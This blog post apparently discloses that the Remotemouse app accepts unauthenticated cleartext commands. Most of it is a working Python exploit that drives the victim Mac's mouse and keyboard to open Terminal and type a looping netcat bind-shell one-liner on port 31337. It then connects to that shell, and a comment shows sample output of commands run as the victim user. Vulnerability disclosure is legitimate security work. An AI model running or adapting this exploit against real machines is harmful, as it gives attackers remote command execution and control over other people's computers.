This weekend I found a nice application to control my mac from my iPhone. It’s Remotemouse from http://www.remotemouse.net.
Unfortunately, when testing it I found out that there is no pairing request and no authentication at all. I fired up Wireshark to see what was happening and, as expected, it is a very dumb cleartext protocol that simply carries mouse gestures, clicks and keyboard events.
I opened my editor and wrote this little script: it connects to my Mac, moves the mouse to the upper-right corner (over the search lens), clicks it, searches for the terminal, opens it and launches a bind shell.
Remotemouse binds on all interfaces, IPv4 and IPv6, so if you use it and allow direct connections from the outside, you are vulnerable.
#!/usr/bin/python # Remote exploit against remotemouse (www.remotemouse.net) # # Launches a remote shell on macosx leopard # # Aris Adamantiadis
# # aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py # enjoy your shell !! # Connection to 192.168.1.3 31337 port [tcp/*] succeeded! # sh: no job control in this shell # aris@aris-laptop:~$ id # id # uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1), # 401(com.apple.access_screensharing),204(_developer),100(_lpoperator), # 98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr), # 61(localaccounts),12(everyone),501(access_bpf) # aris@aris-laptop:~$ exit import time import socket import os right = "mos 6m 9 0" up = "mos 6m 0 -9" diag = "mos 6m 9 -9" fineup = "mos 6m 0 -1" fineright = "mos 6m 1 0" key = "key1 " click = "mos 5R l d" + "mos 5R l u" host = "192.168.1.3" shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit" def keys(v): f="" for i in v: f+= key + i return f s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,1978)) s.send(up * 200 + right * 400 + fineup * 9 + fineright *9) s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) time.sleep(1) s.connect((host,1978)) s.send(click) time.sleep(1) s.send(keys("terminal")) time.sleep(.5) s.send("key3 RTN") time.sleep(.5) s.send(keys(shellcode)) time.sleep(.5) s.send("key3 RTN") time.sleep(.5) s.close() print "enjoy your shell !!" os.system("nc -v " + host + " 31337")